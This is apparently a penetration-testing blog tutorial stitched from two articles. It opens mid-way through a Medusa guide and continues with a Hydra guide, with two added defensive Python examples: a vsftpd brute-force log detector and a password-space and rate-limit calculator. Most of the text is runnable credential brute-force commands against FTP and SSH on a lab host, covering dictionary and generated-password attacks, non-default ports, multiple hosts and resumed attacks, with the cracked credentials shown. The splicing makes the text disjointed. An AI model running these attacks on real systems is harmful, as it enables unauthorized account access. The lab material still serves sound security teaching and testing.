For security reasons a network administrator may move a service to a non-standard port. Medusa attacks the default port of a service, as you can see in all the attacks above, where it automatically connected to port 21 for FTP.
The -n option sets a specific port number so the attack goes to that port instead of the default.
Suppose that while scanning the target I found SSH running on port 2222 instead of 22; I would then run the following commands for an SSH login attack.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh -n 2222
As you can observe, the first command fails to connect because port 22 is closed, whereas the second found one valid password, 123, for username raj on SSH at port 2222.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-qhrFJg7_EvM/W-wqAnDBBLI/AAAAAAAAbHo/Gurkobi9uKQ8EOC4Olgk2f0bKPL8xlYOQCLcBGAs/s1600/7.png?w=687&ssl=1)
NULL/Same as Login Attempt
The -e option adds extra password checks on top of the dictionary: n tries a null (empty) password and s tries a password equal to the username; -e ns enables both.
medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp -e ns
As you can observe, for every username it also tries the following two combinations in addition to the password list:
User "raj" with password "" (null password)
User "raj" with password "raj" (same as the login)
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-WfAm9LXAEdw/W-wqA1mt5_I/AAAAAAAAbHw/PbAjAwVZLuUmIU-3uFjTGLidCsWWop0QQCLcBGAs/s1600/8.png?w=687&ssl=1)
Save logs to Disk
For record keeping, readability and future reference we save Medusa's output to a file. The -O parameter appends log information to the given file.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -O log.txt
Now that the command has run, let's check the location to ensure the output was saved to the file. In this case the output file is /root/log.txt.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-yOmwn4cf-zM/W-wqBhbVKRI/AAAAAAAAbH0/bMBmTtu-iMIYQR_Nv1w1weM_XZiIOGWGwCLcBGAs/s1600/9.png?w=687&ssl=1)
Stop on Success
If you want Medusa to stop attacking a host as soon as the first valid username/password pair is found on that host, add the -f option.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -f
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-6dJjS2KebQY/W-wp760yKUI/AAAAAAAAbG0/l86aqCk87RIEu9YoKFO6Mmpub9lhc4FIwCLcBGAs/s1600/10.png?w=687&ssl=1)
You can also use -F to stop the whole audit after the first valid username/password pair is found on any host.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -F
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-KXyoAxxtQzc/W-wp8QWPiqI/AAAAAAAAbG8/JIYmE1kcoNsctikxZ0yxPGVYxQjxMG_5ACLcBGAs/s1600/11.png?w=687&ssl=1)
Suppress Startup Banner
If you want to hide Medusa's banner while it runs, use the -b option to suppress the startup banner.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -b
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-WIFUhV_gnFI/W-wp89xLN_I/AAAAAAAAbHA/x9mMqilnfzcyrU27RCU1M_VSjXDZdez1wCLcBGAs/s1600/12.png?w=687&ssl=1)
Verbose Mode
Verbose mode has seven levels (0 to 6) for examining the attack in increasing detail, and there is a separate error-debug option with eleven levels (0 to 10). Use -v for the verbosity level and -w for the error-debug level.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 2
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 6
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-W4k2fx06bWs/W-wp9nhOMjI/AAAAAAAAbHI/gBWkJzB8_GEx2WOMRLzRcw8e47Jm23rggCLcBGAs/s1600/13.png?w=687&ssl=1)
Error Debugging Mode
As said above, the error-debug level runs from 0 to 10. In practice the output for levels 0 to 6 is roughly the same with small differences, and levels 7 to 10 are roughly the same as each other but noticeably more detailed than levels 0 to 6.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 01
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 06
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 07
Debug mode shows wait times, socket details, sent and received data sizes, module details and paths.
![[Image: 14.1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-4TbuQJRDoBI/W-wp9qyZl_I/AAAAAAAAbHE/haVQxs9kmSE3DlA-ON93yEdIep5TTBB4wCLcBGAs/s1600/14.1.png?w=687&ssl=1)
Using Combo Entries
The -C option enables the combo file parameter. The combo file should have one record per line, with the values colon separated in the format host_IP:username:password. If any of the three fields is left blank, the respective information must be supplied either as a global value or as a list in a file.
The following combinations are possible in the combo file:
host:username:password
host:username:
host::
:username:password
:username:
::password
host::password
As you can observe in the image below, we have the userpass.txt file in the combo file format, and we can use it with the -C option to launch the brute force attack.
medusa -M ftp -C userpass.txt
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-zSAEn3bOcbc/W-wp-GigORI/AAAAAAAAbHM/ekEygeAoCSkYkNoTUVXqgNa1iYrkB1_yQCLcBGAs/s1600/14.png?w=687&ssl=1)
Resuming the Brute Force Attack
Sometimes while brute-forcing, the attack gets paused, halted or cancelled accidentally. To save time in that situation you can use the -Z option, which enables the resume parameter and continues the brute-forcing from the last dropped attempt of the dictionary instead of starting again from the first attempt.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp
Now you can observe the output in the image below: after pressing Ctrl+C the attack stops, and adding the highlighted text to your command resumes the attack and continues it.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u2u3.
Repeat the same as above; comparing the results of all three commands, you will notice that it continued the brute-forcing from the last dropped attempt.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u3u4.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-H7ahJy5-WPs/W-wp-cg1KGI/AAAAAAAAbHU/WNAW5e8rEx8T7xbGepoem_vMeV7R_bJ0QCLcBGAs/s1600/15.png?w=687&ssl=1)
Hello friends!! Today we are going to discuss how effective Hydra is at cracking the login credentials of various protocols to gain unauthorized access to a system remotely. In this article, we cover each option available in Hydra for making brute force attacks in various scenarios.
Table of Content
- Introduction to hydra
- Multiple Features of Hydra
- Password Guessing For Specific Username
- Username Guessing For Specific Password
- Cracking Login Credential
- Use of Verbose or Debug Mode for Examining Brute Force
- NULL/Same as Login/Reverse login Attempt
- Save Output to Disk
- Resuming The Brute Force Attack
- Password Generating Using Various Set of Characters
- Attacking on Specific Port Instead of Default
- Making Brute Force Attack on Multiple Hosts
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-pKQtiTKzy6I/W-rR7sQE4WI/AAAAAAAAbFY/FHa9g418Peswq66x6AMDgz_gXAl5lkd2ACLcBGAs/s1600/1.png?w=687&ssl=1)
Multiple Features of Hydra
Since we are using the GNOME build of Kali Linux, the thc-hydra package is already included by default. All we need to do is open a terminal, type “hydra -h” and press Enter; you will be greeted by its help screen.
-R : restore a previous aborted/crashed session
-I : ignore an existing restore file.
-S : perform an SSL connect
-s PORT : if the service is on a different default port, define it here
-l LOGIN or -L FILE : login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE : try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET : password bruteforce generation, type “-x -h” to get help
-e nsr : try “n” null password, “s” login as pass and/or “r” reversed login
-u : loop around users, not passwords (effective! implied with -x)
-C FILE : colon separated “login:pass” format, instead of -L/-P options
-M FILE : list of servers to be attacked in parallel, one entry per line
-o FILE : write found login/password pairs to FILE instead of stdout
-f / -F : exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS : run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME : wait time for responses (32s) / between connects per thread
-4 / -6 : prefer IPv4 (default) or IPv6 addresses
-v / -V / -d : verbose mode / show login+pass for each attempt / debug mode
-U : service module usage details
server : the target server (use either this OR the -M option)
service : the service to crack (see below for supported protocols)
OPT : some service modules support additional input (-U for module help)
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-7ElfvBttTLU/W-rR-N1FtnI/AAAAAAAAbF4/mnHcesjmFi46PRw6TM6A-1WY2gkpw7BXwCLcBGAs/s1600/2.png?w=687&ssl=1)
Password Guessing For Specific Username
Hydra is a very effective tool and also quite easy to use for making a brute force attack on any supported protocol.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
Suppose you want to crack the password for FTP (or any other service) where you already know the username, so you only wish to run a password brute force attack using a dictionary to guess the valid password.
At that moment you should go with the following command, where the -l option sets the username and the -P option supplies the dictionary for the password list.
hydra -l raj -P pass.txt 192.168.1.108 ftp
As you can observe it has found 1 valid password: 123 for username: raj for FTP login.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-gQriP4VWSfw/W-rR-HQFm5I/AAAAAAAAbF8/DxDY3U5Yt90v4S9Lbx__LdqtTrCYxFUvgCLcBGAs/s1600/3.png?w=687&ssl=1)
Username Guessing For Specific Password
Suppose you want to crack the username for FTP (or any other service) where you already know the password, so you only wish to run a username brute force attack using a dictionary to guess the valid username. This is the reverse of the situation above.
At that moment you should go with the following command, where the -L option supplies the dictionary for the username list and the -p option sets the password.
hydra -L user.txt -p 123 192.168.1.108 ftp
As you can observe it has found 1 valid username: raj for the password: 123 FTP login.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-rTl73lG48jA/W-rR-TLoM8I/AAAAAAAAbGA/kz6PMjr6OTcAN5YD414dreow9uSQOyZ3ACLcBGAs/s1600/4.png?w=687&ssl=1)
Cracking Login Credential
Suppose you want to crack both the username and the password for FTP (or any other service), so you wish to run a username and password brute force attack using dictionaries to guess the valid combination.
At that moment you should go with the following command, where the -L option supplies the dictionary for the username list and the -P option supplies the dictionary for the password list.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp
As you can observe it has found 1 valid username: raj for password: 123 FTP login.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-FtddgUB7zxg/W-rR-r9LQmI/AAAAAAAAbGE/tYEc2JIGTXA4qd21DfMqdhggkXUa8MmJQCLcBGAs/s1600/5.png?w=687&ssl=1)
Use of Verbose or Debug Mode for Examining Brute Force
You can use the -V option along with each command; with the help of verbose mode you can observe each attempt at matching a valid combination of username and password. If you look at the image below, you will find there are 5 usernames in the user.txt file (L=5) and 5 passwords in the pass.txt file (P=5), so the total number of login attempts is 5*5=25.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-UnxD0k-dDWE/W-rR-ih5xfI/AAAAAAAAbGI/pz-xDTqpSkoFrx3Ic9pkqgl7bO26rMn7QCLcBGAs/s1600/6.png?w=687&ssl=1)
You can also use the -d option, which enables debug and verbose mode together and shows the complete detail of the attack.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-qK3B8uv-PHM/W-rR-zalFxI/AAAAAAAAbGM/RHBsNDGI5IY4yrHL_OLzPcMGxbv64TqLgCLcBGAs/s1600/7.png?w=687&ssl=1)
As you can observe, verbose mode shows each attempt at matching a valid username and password from user.txt and pass.txt, while debug mode shows wait-time, con-wait, socket, send pid and received pid.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-DaYnV07E6B8/W-rR_G2_7KI/AAAAAAAAbGQ/gDA47zTD3i0ILRahttaq9h-9n-aKnBzswCLcBGAs/s1600/8.png?w=687&ssl=1)
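Every one of the 25 attempts that verbose mode lists on the attacking side is a login event on the FTP server, so the same run is visible in the server's log as a burst of FAIL LOGIN lines from one client followed by an OK LOGIN. The Python below is an added example, not code from the article or from the Hydra project: it parses log lines in vsftpd's style (the format is assumed from that style; every sample line is constructed here), keeps a sliding window of failures per client IP, and flags a client that exceeds a threshold inside the window, noting separately when a success arrives while the burst is still in the window, since that is the pattern a successful dictionary attack leaves behind. The function names and the threshold and window values are my own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the login lines vsftpd writes to its log (format assumed from vsftpd's
# style; every sample line in this example is constructed).
LOGIN_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$'
)


def parse_login(line):
    """Return (timestamp, user, result, client_ip), or None for non-login lines."""
    m = LOGIN_RE.match(line)
    if not m:
        return None
    stamp = " ".join(m.group("ts").split())  # collapse padding before a one-digit day
    ts = datetime.strptime(stamp, "%a %b %d %H:%M:%S %Y")
    return ts, m.group("user"), m.group("result"), m.group("ip")


def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Flag client IPs with at least `threshold` failed logins inside a sliding window.

    Returns {ip: {"failures": total_failures, "users": [tried usernames],
                  "success_after_burst": bool}}; success_after_burst is set when an
    OK LOGIN arrives while the failure burst is still inside the window.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    total = defaultdict(int)      # ip -> all failures seen
    users = defaultdict(set)      # ip -> usernames tried
    alerts = {}
    for line in lines:
        parsed = parse_login(line)
        if parsed is None:
            continue              # CONNECT lines and other noise are skipped
        ts, user, result, ip = parsed
        q = recent[ip]
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()           # expire failures older than the window
        if result == "FAIL":
            q.append(ts)
            total[ip] += 1
            users[ip].add(user)
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"success_after_burst": False}
        elif ip in alerts and len(q) >= threshold:
            alerts[ip]["success_after_burst"] = True
    for ip, alert in alerts.items():
        alert["failures"] = total[ip]
        alert["users"] = sorted(users[ip])
    return alerts


def _constructed_sample():
    """Constructed log: one benign client, then 5 users x 5 passwords from a single
    client (24 FAIL lines followed by one OK for 'raj'), i.e. the 25-attempt run
    above as the server sees it."""
    fmt = "%a %b %d %H:%M:%S %Y"
    base = datetime(2018, 11, 12, 10, 15, 0)
    lines = [
        'Mon Nov 12 10:14:30 2018 [pid 4101] [alice] FAIL LOGIN: Client "192.168.1.50"',
        'Mon Nov 12 10:14:40 2018 [pid 4101] [alice] OK LOGIN: Client "192.168.1.50"',
        'Mon Nov 12 10:15:00 2018 [pid 4200] CONNECT: Client "192.168.1.105"',
    ]
    n = 0
    for user in ["root", "admin", "shubham", "user", "raj"]:
        for _ in range(5):
            n += 1
            result = "OK" if n == 25 else "FAIL"
            stamp = (base + timedelta(seconds=n)).strftime(fmt)
            lines.append(f'{stamp} [pid {4200 + n}] [{user}] {result} LOGIN: Client "192.168.1.105"')
    return lines


SAMPLE_LINES = _constructed_sample()

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LINES).items():
        print(ip, alert)
```

The benign client fails once and then logs in, which never reaches the threshold; the attacking client is flagged at its tenth failure and the final OK LOGIN sets success_after_burst, which is the event to treat as a probable compromise rather than just noise. Lower the window or raise the threshold to fit the traffic of a real server.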
NULL/Same as Login/Reverse login Attempt
Using the -e option with nsr enables three extra attempts on the password field while brute-forcing: null password, same as login, and reversed login. If you look at the image below, you will notice that this time L=5 and P has automatically become 8, which means the total number of login tries is now 5*8=40.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -V -e nsr
As you can observe, for every username it tries the following combinations in addition to the password list:
Login “root” and pass “” as the null password
Login “root” and pass “root” as the same as the login
Login “root” and pass “toor” as the reverse of the login
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-t-jScz9U2Rs/W-rR_YI-hXI/AAAAAAAAbGU/8deCVVZTh9Ib6YtoFNr1YK9A5pT3-WuLACLcBGAs/s1600/9.png?w=687&ssl=1)
Save Output to Disk
For the purposes of record keeping, better readability and future reference, we will save the output of the Hydra brute force attack to a file. To do this, we use Hydra's -o parameter to save the output to a text file.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -o result.txt
Now that we have successfully executed the command, let's go to the location to check whether the output has been saved to the file. In this case, our output location is /root/output.txt.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-eCHcPEE7WP4/W-rR7uQpmkI/AAAAAAAAbFU/T5H5hLBtPR085WMN4ybbN-z7K5he6v26gCLcBGAs/s1600/10.png?w=687&ssl=1)
Resuming the Brute Force Attack
Sometimes while brute-forcing, the attack gets paused, halted or cancelled accidentally. To save time in that situation you can use the -R option, which enables the resume parameter and continues the brute-forcing from the last dropped attempt of the dictionary instead of starting again from the first attempt.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp
hydra -R
Now you can observe the output in the image below: after pressing Ctrl+C the attack stopped, and typing hydra -R resumed the attack and continued it.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-IA-i1udxR0s/W-rR7_hD0wI/AAAAAAAAbFc/CbEpM3EGoKkFUSdBa70ERBPEfT-wZTlgACLcBGAs/s1600/11.png?w=687&ssl=1)
Password Generation Using Various Sets of Characters
Hydra has the -x option, which enables password generation and takes the following arguments:
-x MIN:MAX:CHARSET
MIN specifies the minimum number of characters in the password
MAX specifies the maximum number of characters in the password
CHARSET specifies the characters to use in the generation. Valid CHARSET values are: ‘a’ for lowercase letters, ‘A’ for uppercase letters, ‘1’ for numbers, and for all other characters, just add their literal representation.
-y disables the use of the above letters as placeholders
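The -x specification and the -e nsr figure from the earlier section (L=5, P=8, 40 tries) are both simple counting problems, and working them out is how a defender sizes a lockout or rate-limit policy: the question is how many guesses a policy has to absorb before a short password is exhausted. The Python below is an added example, not part of the article or of Hydra. It counts the candidates a -x MIN:MAX:CHARSET spec expands to (with or without -y), the attempts a dictionary run with -e flags makes, and the wall-clock time a per-minute login limit forces on that many attempts. The function names and the rate-limit figures are my own; overlap between a placeholder class and a literal character in the same spec is not deduplicated.

```python
from math import ceil

LOWER, UPPER, DIGITS = 26, 26, 10   # sizes of the 'a', 'A' and '1' placeholder classes


def alphabet_size(charset, literal=False):
    """Size of the alphabet a -x CHARSET spec expands to.

    Without -y, 'a' stands for all lowercase letters, 'A' for all uppercase
    letters and '1' for all digits; any other character counts literally.
    With -y (literal=True) every character counts literally.
    """
    seen = set()
    size = 0
    for ch in charset:
        if ch in seen:
            continue                 # a repeated character does not enlarge the alphabet
        seen.add(ch)
        if not literal and ch == "a":
            size += LOWER
        elif not literal and ch == "A":
            size += UPPER
        elif not literal and ch == "1":
            size += DIGITS
        else:
            size += 1
    return size


def generated_candidates(min_len, max_len, charset, literal=False):
    """Number of passwords -x MIN:MAX:CHARSET enumerates over all lengths MIN..MAX."""
    if min_len < 1 or max_len < min_len:
        raise ValueError("need 1 <= MIN <= MAX")
    n = alphabet_size(charset, literal)
    return sum(n ** length for length in range(min_len, max_len + 1))


def dictionary_attempts(logins, passwords, e_flags=""):
    """Login attempts for -L/-P lists; each of -e n, s and r adds one password per login."""
    extra = len(set(e_flags) & set("nsr"))
    return logins * (passwords + extra)


def seconds_to_exhaust(attempts, max_attempts_per_minute):
    """Wall-clock seconds a limit of N login attempts per minute forces for this many attempts."""
    if max_attempts_per_minute <= 0:
        raise ValueError("rate limit must be positive")
    return ceil(attempts / max_attempts_per_minute * 60)


if __name__ == "__main__":
    # The article's own runs: 1:3:1 (numeric) and 1:3:a (lowercase), and 5 users x 5 passwords with -e nsr.
    print("1:3:1 ->", generated_candidates(1, 3, "1"), "candidates")
    print("1:3:a ->", generated_candidates(1, 3, "a"), "candidates")
    print("5 x 5 with -e nsr ->", dictionary_attempts(5, 5, "nsr"), "attempts")
    # Constructed policy figure: 5 attempts per minute per client.
    print("1:3:1 under 5/min ->", seconds_to_exhaust(generated_candidates(1, 3, "1"), 5), "s")
```

Read the output as exposure: a 1-3 digit password is 1,110 guesses, which the unthrottled runs in this article finish in seconds, while a limit of 5 attempts per minute per client stretches the same enumeration to almost four hours, and an alphanumeric 8-character policy pushes the count far beyond what any rate limit needs to absorb.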
Now suppose we want to try 123 as the password. For that I should set MIN=1, MAX=3 and CHARSET=1 to generate numeric passwords for the given username, and run the following command.
hydra -l shubham -x 1:3:1 …
or
hydra -l raj -x 1:3:1 192.168.1.108 ftp
hydra -l raj -x 1:3:1 192.168.1.108 ftp -y
As you can observe, it has found 1 valid password: 123 for username: raj for FTP login.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-qymv80-WDkI/W-rR8URR_xI/AAAAAAAAbFg/K_NxCieiWEIkzedYjdtTKory47Pse4dLACLcBGAs/s1600/12.png?w=687&ssl=1)
Now suppose we want to try abc as the password. For that I should set MIN=1, MAX=3 and CHARSET=a to generate lowercase passwords for the given username, and run the following command.
hydra -l shubham -x 1:3:a … -V
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-Dcc_miCllR8/W-rR8t21GrI/AAAAAAAAbFk/Y1iZOA9v9MEJXkaUwryWGhdKMc4Llpr7ACLcBGAs/s1600/13.png?w=687&ssl=1)
As you can observe, it has found 1 valid password: abc for username: shubham for FTP login.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/--3St8F19EBc/W-rR8yDlfII/AAAAAAAAbFo/PzG8LUFX598bih_tJTSv8EnfXoJp1839gCLcBGAs/s1600/14.png?w=687&ssl=1)
Attacking on Specific Port Instead of Default
For security reasons, a network admin may move a service to a non-default port. Hydra runs its brute force attack against the default port of the service; as you can observe in all the attacks above, it automatically attacked port 21 for FTP login.
But you can use the -s option, which sets a specific port number, to launch the attack on the given port instead of the default one.
Suppose that while scanning the target network I found FTP running on port 2121 instead of 21; I would then execute the following command for the FTP login attack.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -s 2121
As you can observe it has found 1 valid password: 123 for username: raj for FTP login.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-rySUaWhYDdE/W-rR89vWgMI/AAAAAAAAbFs/YUQOtoNZfAUfyJDSkpzBVTDcp6DiVhWSwCLcBGAs/s1600/15.png?w=687&ssl=1)
Making Brute Force Attack on Multiple Hosts
If you want to use the same user and password dictionaries against multiple hosts in a network, you can use the -M option, which takes a host list, and Hydra will run the same number of login attempts against each host IP listed in the file.
Here you can observe that I saved two host IPs in a text file and then used the following command to brute force multiple hosts with the same dictionaries.
hydra -L user.txt -P pass.txt -M hosts.txt ftp
As you can observe it has found 2 valid FTP logins for each Host.
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-kpjmaGEhTM0/W-rR9JCgiBI/AAAAAAAAbFw/8BQAOo2Lv-c45xs0fkVro8ckiAnoj5C-gCLcBGAs/s1600/16.png?w=687&ssl=1)
Suppose you have a list of multiple targets and wish to finish the brute force attack as soon as a valid login is found for any host IP; then you should use the -F option, which stops the whole run once a valid credential is found for any host in the list.
hydra -L user.txt -P pass.txt -M hosts.txt ftp -V -F
As you can observe, it found 1 valid FTP login for 192.168.1.108 and finished the attack.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-9m5VH1-NyEo/W-rR9lX8XhI/AAAAAAAAbF0/xmV1G4cqCh4ONK0I3Z8Bsk2ffJlwKdsUACLcBGAs/s1600/17.png?w=687&ssl=1)
Disclaimer by Hydra – Please do not use in military or secret service organizations, or for illegal purposes.